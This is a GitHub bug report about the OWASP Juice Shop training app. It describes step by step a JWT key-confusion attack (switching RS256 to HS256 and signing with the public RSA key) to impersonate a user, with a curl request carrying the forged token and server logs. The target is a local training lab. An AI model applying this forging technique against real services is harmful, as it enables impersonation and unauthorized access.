[🐛] Solving Forged Signed JWT results in UnauthorizedError: invalid signature
🐛 Bug report
Description
When trying to solve the Forged Signed JWT challenge, Juice Shop responds with both an UnauthorizedError: invalid signature
and marks the challenge as solved. I do not know if my approach is wrong (and the challenge should not be marked as solved), or if there is a bug showing an error where it shouldn’t.
Is this a regression?
Unknown, I have not tested this with older releases.
🔬 Minimal Reproduction
- Log in as admin to receive a working JWT.
- Copy the JWT to jwt.io and change the email to ‘rsa_lord@juice-sh.op’.
- Switch the algorithm to HS256.
- Paste the public RSA key as HMAC.
- Send a GET request to /api/Users using the forged JWT:
curl -X GET -H "Content-Type: application/json" -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6InJzYV9sb3JkQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImxhc3RMb2dpbklwIjoiMC4wLjAuMCIsInByb2ZpbGVJbWFnZSI6ImRlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDIwLTAyLTA2IDA4OjI2OjE1LjY1OCArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDIwLTAyLTA2IDA4OjI2OjE1LjY1OCArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE1ODA5Nzc2ODcsImV4cCI6MTU4MDk5NTY4N30.D_G5GDBrDpcKn3kZYg-CgBjilAVdqs0INcurxZ1sH9A" http://localhost:3000/api/Users
🔥 Exception or Error
> juice-shop@9.3.1 start C:\Users\Public\dev\juice-shop_9.3.1
> node app
info: All dependencies in ./package.json are satisfied (OK)
info: Detected Node.js version v12.14.1 (OK)
info: Detected OS win32 (OK)
info: Detected CPU x64 (OK)
info: Required file index.html is present (OK)
info: Required file styles.css is present (OK)
info: Required file main-es2015.js is present (OK)
info: Required file tutorial-es2015.js is present (OK)
info: Required file polyfills-es2015.js is present (OK)
info: Required file runtime-es2015.js is present (OK)
info: Required file vendor-es2015.js is present (OK)
info: Required file main-es5.js is present (OK)
info: Required file tutorial-es5.js is present (OK)
info: Required file polyfills-es5.js is present (OK)
info: Required file runtime-es5.js is present (OK)
info: Required file vendor-es5.js is present (OK)
info: Configuration default validated (OK)
info: Port 3000 is available (OK)
info: Server listening on port 3000
info: Solved challenge Score Board (Find the carefully hidden 'Score Board' page.)
info: Solved challenge Password Strength (Log in with the administrator's user credentials without previously changing them or applying SQL Injection.)
info: Solved challenge Login Admin (Log in with the administrator's user account.)
UnauthorizedError: invalid signature
info: Solved challenge Forged Signed JWT (Forge an almost properly RSA-signed JWT token that impersonates the (non-existing) user rsa_lord@juice-sh.op.)
info: Solved challenge Error Handling (Provoke an error that is neither very gracefully nor consistently handled.)
🌳 Your Environment
Node.js: v12.14.1
npm: 6.13.4
Additional Information
I have not identified any relevant additional factors yet.
Top GitHub Comments
The way I understand this challenge, this is supposed to allow for a key confusion attack. If Juice Shop uses a vulnerable library and does not explicitly specify the algorithm to verify, it will use HMAC as specified in my JWT using the public RSA key to verify the signature. Since the public key can be obtained, it should be possible to create a JWT token that passes signature validation.
IMHO, solving this challenge should allow the attacker to access content using the forged token. So either I made a mistake and really didn’t solve the challenge (then it should not be marked as such), or the forged token is not accepted as originally intended.
Yes, that’s it. I have no clue why, but it seems only Windows is unhackable in that regard… 😂